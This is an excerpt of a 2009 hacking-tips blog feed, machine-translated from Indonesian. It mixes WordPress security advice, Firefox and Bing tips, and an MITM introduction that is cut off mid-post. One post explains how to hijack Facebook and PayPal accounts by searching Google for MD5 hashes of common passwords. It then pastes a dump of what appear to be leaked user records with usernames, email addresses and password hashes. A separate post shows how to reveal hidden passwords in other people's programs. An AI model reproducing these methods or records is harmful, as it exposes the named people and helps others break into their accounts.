Hacking!&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-3224437547296274957?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/3224437547296274957/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/12/hack-server-using-php-bugs-injection.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/3224437547296274957'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/3224437547296274957'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/12/hack-server-using-php-bugs-injection.html' title='Hack a server using PHP Bugs Injection.'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-667878532504926352</id><published>2009-12-14T20:28:00.000-08:00</published><updated>2009-12-14T20:31:47.590-08:00</updated><title type='text'>Other ways Hack Paypal, Facebook, Etc.</title><content type='html'>want to hack Paypal Account, or search on Facebook Poker Chips?&lt;br /&gt;If using Keylogger, guns may be long-lasting, because &lt;span class="fullpost"&gt;over time the guard cafe will know, want to use login Fake rarely hit, because they already bookmark facebook page.&lt;br /&gt;Maybe it could gunain way Like These:&lt;br /&gt;1.siapkan Coffee, While smoking&lt;br /&gt;2. Go to the website to encrypt the MD5, for example http://www.md5encryption.com&lt;br /&gt;3. Enter the password that is used by some about facebook users, say Bismillah, Indonesia, Jakarta, Semarang, etc.&lt;br /&gt;4. I take the example search for accounts that use passwords Bismillah. I will encrypt the password into MD5 Bismillah so the result a8e52217c48d055fb98e2732c587d056&lt;br /&gt;5. Use Google as a search with keywords a8e52217c48d055fb98e2732c587d056&lt;br /&gt;Result ........ Wew, cool ..............&lt;br /&gt;=======================================&lt;br /&gt;: (S: 2: "ID"; s: 2: "15"; s: 10: "user_login"; s: 11: "suci2006tri"; s: 9: "user_pass"; s: 32: "cbadce38e78bbb5f69e70e8d30d6421c"; s: 10: "USER_EMAIL"; s: 21: "suci2006tri@yahoo.com"; s: 8: "user_url"; s: 7: "http://";) i: 13; a: 5: (s : 2: "ID"; s: 2: "16"; s: 10: "user_login"; s: 11: "ejaalfabeta"; s: 9: "user_pass"; s: 32: "5099cad5505d32f53d351292772f23a5"; s: 10 : "USER_EMAIL"; s: 21: "asah_pena@yahoo.co.id"; s: 8: "user_url"; s: 7: "http://";) i: 14; a: 5: (s: 2: "ID"; s: 2: "17"; s: 10: "user_login"; s: 9: "shadyhuda"; s: 9: "user_pass"; s: 32: "662906a82298148e463c55c03e9dd15e"; s: 10: "USER_EMAIL"; s: 20: "penasyahid@gmail.com"; s: 8: "user_url"; s: 36: "http://www.baityjannati.blogspot.com";) i: 15; a: 5 : (s: 2: "ID"; s: 2: "18"; s: 10: "user_login"; s: 5: "WaOne"; s: 9: "user_pass"; s: 32: "c3653e4408832e6611f37dcd90544de8"; s: 10: "USER_EMAIL"; s: 18: "WaOne_09@yahoo.com"; s: 8: "user_url"; s: 8: "http://-";) i: 16; a: 5: ( s: 2: "ID"; s: 2: "20"; s: 10: "user_login"; s: 15: "gadislilinkecil"; s: 9: "user_pass"; s: 32: "9abd53722e8e33d2c93e5d84d0545dea"; s: 10: "USER_EMAIL"; s: 25: "iniemaibaruku@yahoo.co.id"; s: 8: "user_url"; s: 7: "http://";) i: 17; a: 5: (s : 2: "ID"; s: 2: "22"; s: 10: "user_login"; s: 5: "Mary"; s: 9: "user_pass"; s: 32: "0c5d7c458d8aa95f78ee1cd6af30942a"; s: 10 : "USER_EMAIL"; s: 14: "marry@rock.com"; s: 8: "user_url"; s: 7: "http://";) i: 18; a: 5: (s: 2: "ID"; s: 2: "23"; s: 10: "user_login"; s: 11: "herupranoto"; s: 9: "user_pass"; s: 32: "e16fef44c04d17721f422a64a250dad5"; s: 10: "USER_EMAIL "; s: 20:" hr_pranoto@yahoo.com "; s: 8:" user_url "; s: 7:" http:// ";) i: 19; a: 5: ======&lt;br /&gt;And much more in reply to explore, he he he ...&lt;br /&gt;I just gave a tutorial, and is not responsible for the use of this tutorial if misused.&lt;br /&gt;Tip: For you, Whoever you are. Do not use a standard password which may be known, use a combination of numbers or characters even special characters. Suppose Bismillah999 *&amp;^%$&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-667878532504926352?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/667878532504926352/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/12/other-ways-hack-paypal-facebook-etc.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/667878532504926352'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/667878532504926352'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/12/other-ways-hack-paypal-facebook-etc.html' title='Other ways Hack Paypal, Facebook, Etc.'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-188376508510761028</id><published>2009-12-01T06:39:00.000-08:00</published><updated>2009-12-01T06:41:23.659-08:00</updated><title type='text'>Tips to Avoid Hacking WordPress Blog Engine</title><content type='html'>Not infrequently a webmaster or blogger was worried at the hack, especially with the more popular a website, the more often exposed and threatened hack. To avoid this danger, here are some tips to secure your &lt;span class="fullpost"&gt;wordpress installation from hack attacks. &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Secure Database&lt;/span&gt; &lt;br /&gt;The first suggestion that I recommend is to secure the database you website or blog. How, make frequent backups of the database and backup data regularly. You can do this through phpMyAdmin hosting account, or using plugins, like WP-Database Backup (http://wordpress.org/extend/plugins/wp-db-backup/). These plugins backup task becomes easier. You just need to log into WordPress admin panel, then click a few links. These plugins should be owned by every blogger. &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Scan WordPress &lt;/span&gt;&lt;br /&gt;After a plugin that protect a database website, the next step is to scan to make sure the WordPress installation not found a gap in security. This task can be done also by using a plugin called WP Security Scan (http://wordpress.org/extend/plugins/wp-security-scan/). With this plugin you can mengedintifikasi gap - if the security hole found in the blog. In addition we will be told how to fix it. WP Security Scan plugins will also be offered for tables renaming prefixes, password strength testing, remove the admin account and verify your blog directory to have good security. &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Tree Intruders&lt;/span&gt; &lt;br /&gt;Intruder in this sense is a combination of letters, numbers and so are trying to find the password. Even bias Python script used to try to find the password you WordPress blog. &lt;br /&gt;&lt;br /&gt;It would be very easy for an intruder to find the password if you use a blog or a word that is predictable. Therefore, try to use the correct password - really strong, using a combination of lowercase letters, numbers and special characters. You're also biased using a password generator in the WP Security Scan to create a strong password. &lt;br /&gt;While using the password is juat a good trick, another way that will provide efficient protection for your blog, by adding an Apache Login form to the WP-Admin directory. Ask Apache (WP Security Scan) plugin allows you to protect your wp-admin directory was the equivalent of the security authentication server level (htpasswd). This plugin allows you to disable hotlinking, or prevent direct access to the wp-content directory and wp-includes. &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Observe Plugins &lt;/span&gt;&lt;br /&gt;Not all plugins were good, some of them who are the eyes - the eyes to see that there are security gaps in your blog. For this reason, there is a need for you to hide the content directory / wp-content/plugins. The trick is to create an empty file named index.html, which is then uploaded to the directory wp-content/plugins &lt;br /&gt;&lt;br /&gt;WordPress version Hide &lt;br /&gt;If there is a security hole in certain versions of WP, a hacker only needs to show the source code of your blog on your browser and see if the version you are wearing a bias related to penetrate. With the left version of Meta, chances are you biased infiltrated blog. To prevent this, delete the line in header.php in the theme you use. Similarly, there is also a plugin that allows you to trick on the version of WordPress that you use.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-188376508510761028?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/188376508510761028/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/12/tips-to-avoid-hacking-wordpress-blog.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/188376508510761028'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/188376508510761028'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/12/tips-to-avoid-hacking-wordpress-blog.html' title='Tips to Avoid Hacking WordPress Blog Engine'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-4783586715499804263</id><published>2009-12-01T06:36:00.000-08:00</published><updated>2009-12-01T06:39:07.507-08:00</updated><title type='text'>Tips Dismantling Hidden Password</title><content type='html'>If you frequently use a password that is hidden, usually appearing in the form of aasterik (*). To display the contents of the password behind the asterisk, then you can try Asterisk Key freeware software, either to display the passwords in desktop applications, like Microsoft Word, Excel, QuickBooks, Access, PDF and etc., are also on the &lt;span class="fullpost"&gt;website.&lt;br /&gt;&lt;br /&gt;To try Asterisk Key:&lt;br /&gt;&lt;br /&gt;Download program Asterisk Key (http://www.lostpassword.com/f/downloads/ariskkey/a riskkey.exe)&lt;br /&gt;Find a website or run a program that would be hackers password&lt;br /&gt;Click the words "Recover"&lt;br /&gt;As an example below:&lt;br /&gt;Asterisk Key has been found hidden passwords, ie password passwordku named application, and password in the web of secrets.&lt;br /&gt;&lt;br /&gt;Display results as follows:&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Dctv9GCvTgs/SxUqRURzqVI/AAAAAAAAATo/wmQM0R71grA/s1600/asterisk_key1.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 233px; height: 172px;" src="http://4.bp.blogspot.com/_Dctv9GCvTgs/SxUqRURzqVI/AAAAAAAAATo/wmQM0R71grA/s400/asterisk_key1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5410277004345059666" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Dctv9GCvTgs/SxUqaARnBjI/AAAAAAAAATw/GfaF_5fKXSc/s1600/asterisk_key2.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 239px; height: 189px;" src="http://3.bp.blogspot.com/_Dctv9GCvTgs/SxUqaARnBjI/AAAAAAAAATw/GfaF_5fKXSc/s400/asterisk_key2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5410277153594345010" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-4783586715499804263?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/4783586715499804263/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/12/tips-dismantling-hidden-password.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/4783586715499804263'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/4783586715499804263'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/12/tips-dismantling-hidden-password.html' title='Tips Dismantling Hidden Password'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_Dctv9GCvTgs/SxUqRURzqVI/AAAAAAAAATo/wmQM0R71grA/s72-c/asterisk_key1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-7215843510106620210</id><published>2009-11-14T21:21:00.000-08:00</published><updated>2009-11-14T21:31:23.801-08:00</updated><title type='text'>8 Easy Firefox Tweaks for Super Fast Web Browsing</title><content type='html'>Fast loading web pages while surfing the Internet may have more to do with your web browser settings and preferences than your Internet connection speed. &lt;br /&gt;&lt;br /&gt;Try these easy Firefox tweaks and you’ll see that you’re surfing the Internet from 3 to 30 times faster! &lt;br /&gt;&lt;br /&gt;To get started, open your Firefox web browser. In the address/location bar type [about:config] and then press your Enter key. (NOTE: DON’T TYPE THE BRACKETS.)&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Dctv9GCvTgs/Sv-QHAO_I9I/AAAAAAAAASA/oEPvDflFzNA/s1600-h/firefoxtricks1.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 220px;" src="http://1.bp.blogspot.com/_Dctv9GCvTgs/Sv-QHAO_I9I/AAAAAAAAASA/oEPvDflFzNA/s400/firefoxtricks1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5404196527864226770" /&gt;&lt;/a&gt;&lt;br /&gt;Tweak #1:&lt;br /&gt;In the Filter bar type &lt;span class="fullpost"&gt;[network.http.pipelining]. Then, double-click on this line under Preference Name in order to change the value from false to true.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Dctv9GCvTgs/Sv-QWRA6j1I/AAAAAAAAASI/XjTSHuYoh9s/s1600-h/firefoxtricks2.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 194px;" src="http://1.bp.blogspot.com/_Dctv9GCvTgs/Sv-QWRA6j1I/AAAAAAAAASI/XjTSHuYoh9s/s400/firefoxtricks2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5404196790066646866" /&gt;&lt;/a&gt;&lt;br /&gt;Tweak #2:&lt;br /&gt;In the Filter bar type [network.http.pipelining.maxrequests]. Then, double-click on this line under Preference Name and change the value from 4 to a higher number anywhere from 10 to 30. I set mine to 30.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sv-QjJ0CtyI/AAAAAAAAASQ/EyuSSKbBDFk/s1600-h/firefoxtricks3.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 206px;" src="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sv-QjJ0CtyI/AAAAAAAAASQ/EyuSSKbBDFk/s400/firefoxtricks3.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5404197011471906594" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Tweak #3:&lt;br /&gt;In the Filter bar type [network.http.proxy.pipelining]. Then, double-click on this line under Preference Name in order to change the value from false to true.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Dctv9GCvTgs/Sv-QwCF99QI/AAAAAAAAASY/50-gKmO8GVk/s1600-h/firefoxtricks4.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 194px;" src="http://3.bp.blogspot.com/_Dctv9GCvTgs/Sv-QwCF99QI/AAAAAAAAASY/50-gKmO8GVk/s400/firefoxtricks4.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5404197232737907970" /&gt;&lt;/a&gt;&lt;br /&gt;Tweak #4:&lt;br /&gt;In the Filter bar type [network.dns.disableIPv6]. Then, double-click on this line under Preference Name in order to change the value from false to true.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Dctv9GCvTgs/Sv-RFHHDdNI/AAAAAAAAASg/a6-IyZkTeJ8/s1600-h/firefoxtricks5.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 196px;" src="http://1.bp.blogspot.com/_Dctv9GCvTgs/Sv-RFHHDdNI/AAAAAAAAASg/a6-IyZkTeJ8/s400/firefoxtricks5.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5404197594861892818" /&gt;&lt;/a&gt;&lt;br /&gt;Tweak #5:&lt;br /&gt;In the Filter bar type [plugin.expose_full_path]. Then, double-click on this line under Preference Name in order to change the value from false to true.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sv-RRzqPLuI/AAAAAAAAASo/JGufT95UV00/s1600-h/firefoxtricks6.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 191px;" src="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sv-RRzqPLuI/AAAAAAAAASo/JGufT95UV00/s400/firefoxtricks6.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5404197812979052258" /&gt;&lt;/a&gt;&lt;br /&gt;Tweak #6:&lt;br /&gt;In the Filter bar type [network.protocol-handler.external.ms-help]. Now, you are going to create a new Preference Name with an Integer Value. To do this, right-click on this line under Preference Name and select New, then Integer.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Dctv9GCvTgs/Sv-Rbq1Nu5I/AAAAAAAAASw/shOW7lLn-z8/s1600-h/firefoxtricks7.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 250px;" src="http://1.bp.blogspot.com/_Dctv9GCvTgs/Sv-Rbq1Nu5I/AAAAAAAAASw/shOW7lLn-z8/s400/firefoxtricks7.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5404197982407867282" /&gt;&lt;/a&gt;&lt;br /&gt;In the New Integer value box type in [nglayout.initialpaint.delay] and click OK. Then in the Enter Integer value box type [0] (that’s a zero) and click OK.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Dctv9GCvTgs/Sv-RmtQGVjI/AAAAAAAAAS4/mWzmrNJxosg/s1600-h/firefoxtricks8.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 345px; height: 175px;" src="http://2.bp.blogspot.com/_Dctv9GCvTgs/Sv-RmtQGVjI/AAAAAAAAAS4/mWzmrNJxosg/s400/firefoxtricks8.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5404198172036060722" /&gt;&lt;/a&gt;&lt;br /&gt;Tweak #7:&lt;br /&gt;In the Filter bar again type [network.protocol-handler.external.ms-help]. Now, you are going to create another new Preference Name with an Integer Value. To do this, right-click on this line under Preference Name and select New, then Integer. In the New Integer value box type in [content.notify.backoffcount] and click OK. Then in the Enter Integer value box type [5] and click OK.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Dctv9GCvTgs/Sv-RxWYQKoI/AAAAAAAAATA/G3ehBjk4i8Y/s1600-h/firefoxtricks9.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 345px; height: 168px;" src="http://3.bp.blogspot.com/_Dctv9GCvTgs/Sv-RxWYQKoI/AAAAAAAAATA/G3ehBjk4i8Y/s400/firefoxtricks9.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5404198354874804866" /&gt;&lt;/a&gt;&lt;br /&gt;Tweak #8:&lt;br /&gt;In the Filter bar again type [network.protocol-handler.external.ms-help]. Now, you are going to create another new Preference Name with an Integer Value. To do this, right-click on this line under Preference Name and select New, then Integer. In the New Integer value box type in [ui.submenuDelay] and click OK. Then in the Enter Integer value box type [0] (that’s a zero) and click OK.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sv-R6hVsSqI/AAAAAAAAATI/s4NShLDYw20/s1600-h/firefoxtricks10.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 342px; height: 166px;" src="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sv-R6hVsSqI/AAAAAAAAATI/s4NShLDYw20/s400/firefoxtricks10.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5404198512435677858" /&gt;&lt;/a&gt;&lt;br /&gt;Now, close your web browser and restart it. You’ll see how much faster web pages are loading. I sure did.&lt;br /&gt;&lt;br /&gt;Let me know if these tweaks increase your Internet browsing speed. Know of any other tweaks or tricks? Let me know and I’ll add them.&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-7215843510106620210?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/7215843510106620210/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/11/8-easy-firefox-tweaks-for-super-fast.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/7215843510106620210'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/7215843510106620210'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/11/8-easy-firefox-tweaks-for-super-fast.html' title='8 Easy Firefox Tweaks for Super Fast Web Browsing'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_Dctv9GCvTgs/Sv-QHAO_I9I/AAAAAAAAASA/oEPvDflFzNA/s72-c/firefoxtricks1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-103494338837585083</id><published>2009-11-14T20:29:00.000-08:00</published><updated>2009-11-14T21:04:02.333-08:00</updated><title type='text'>Bing Tips &amp; Tricks</title><content type='html'>Now that Bing is available for use outside Microsoft, here are some quick tips and tricks that will help you do more with Bing.com.&lt;br /&gt;1. Use the full version of Bing&lt;br /&gt;If you are using Bing outside North America, chances are that you seeing a localized version of Bing that may be missing some features. For instance, the Indian version of Bing.com doesn’t have search history and &lt;span class="fullpost"&gt;the image on the Bing home page here is not interactive as in the US version.&lt;br /&gt;To explore the full version of Bing, go to this page and set English - US as your default region. You can now enjoy all the Bing features from anywhere.&lt;br /&gt;2. Track Companies from the IE Favorites Bar&lt;br /&gt;If you search for a company stock (e.g. GOOG or MSFT), Bing will automatically create aweb slice for that company which you may then add to IE 8 and track the performance directly from the favorites bar. You need Internet Explorer 8 to try this feature.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Dctv9GCvTgs/Sv-Lh-n5vhI/AAAAAAAAAR4/Do9OMu2gIIo/s1600-h/stockslices.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 243px;" src="http://2.bp.blogspot.com/_Dctv9GCvTgs/Sv-Lh-n5vhI/AAAAAAAAAR4/Do9OMu2gIIo/s400/stockslices.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5404191493730188818" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;3. Watch Preview of Hulu Videos outside US&lt;br /&gt;Hulu hosts some popular popular TV shows but the problem is that you can only watch these videos if your computer has US based IP address.&lt;br /&gt;However, Bing lets you watch shot previews of Hulu video even outside US. Just search for any TV show episode on Bing Videos (see example) and hover the mouse over any of the video thumbnail to watch a short clip.&lt;br /&gt;4. Save and Email search results&lt;br /&gt;With Bing, you can save your search history on to a local folder inside Bing or to your Windows Skydrive account. Alternatively, you may send your search queries to a friend via email or publish them on your Facebook wall via Bing. You’ll need Silverlight to share queries in Bing&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Dctv9GCvTgs/Sv-LM9wgs-I/AAAAAAAAARw/Cnw8OPIGD6Y/s1600-h/savesearch.jpeg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 132px;" src="http://1.bp.blogspot.com/_Dctv9GCvTgs/Sv-LM9wgs-I/AAAAAAAAARw/Cnw8OPIGD6Y/s400/savesearch.jpeg" border="0" alt=""id="BLOGGER_PHOTO_ID_5404191132720608226" /&gt;&lt;/a&gt;&lt;br /&gt;5. RSS Feeds of Search Results&lt;br /&gt;Unlike Google or Yahoo, Bing offers RSS feeds for their web search results that you can subscribe to inside any feed reader. Your browser should be able to auto-detect the RSS feed of Bing pages or you can append &amp;format=rss to any Bing search URL and convert it into a feed.&lt;br /&gt;This RSS feature is not available for Image or Video search in Bing.&lt;br /&gt;6. Find Pages That Link to MP3 Files or Documents&lt;br /&gt;Bing (and Live Search) supports a unique "contains" search operator that lets you find web pages that contain links to particular file types.&lt;br /&gt;For instance, a search like susan boyle contains:mp3 will show pages that are about the British singer and that also link to MP3 files. Replace mp3 with doc to search pages that contain links to Word Documents.&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-103494338837585083?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/103494338837585083/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/11/bing-tips-tricks.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/103494338837585083'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/103494338837585083'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/11/bing-tips-tricks.html' title='Bing Tips &amp; Tricks'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_Dctv9GCvTgs/Sv-Lh-n5vhI/AAAAAAAAAR4/Do9OMu2gIIo/s72-c/stockslices.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-7892247184906048009</id><published>2009-11-02T22:42:00.000-08:00</published><updated>2009-11-02T23:00:01.583-08:00</updated><title type='text'>Know Attacks Man-in-the-Middle (MITM)</title><content type='html'>There have been many articles that discuss techniques ilmuhacking attack man in the middle (mitm), but I never explained in detail about what it mitm attack. Mitm attack is a type of attack is very dangerous and can happen anywhere, whether on websites, cell phones, as well as in traditional communications tools like mail correspondence. Therefore I think there needs to be a special article discussing mitm attack and no matter where the technical implementation.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Not Just Sniffing&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Perhaps many who thought the purpose of mitm attack is to extract confidential data communications, such as sniffing. Sniffing can be called passive sniffing attack because the attacker did not do&lt;span class="fullpost"&gt;any action other than monitoring the data passing. It is true with mitm attack, an attacker can find out what was discussed by the two parties are 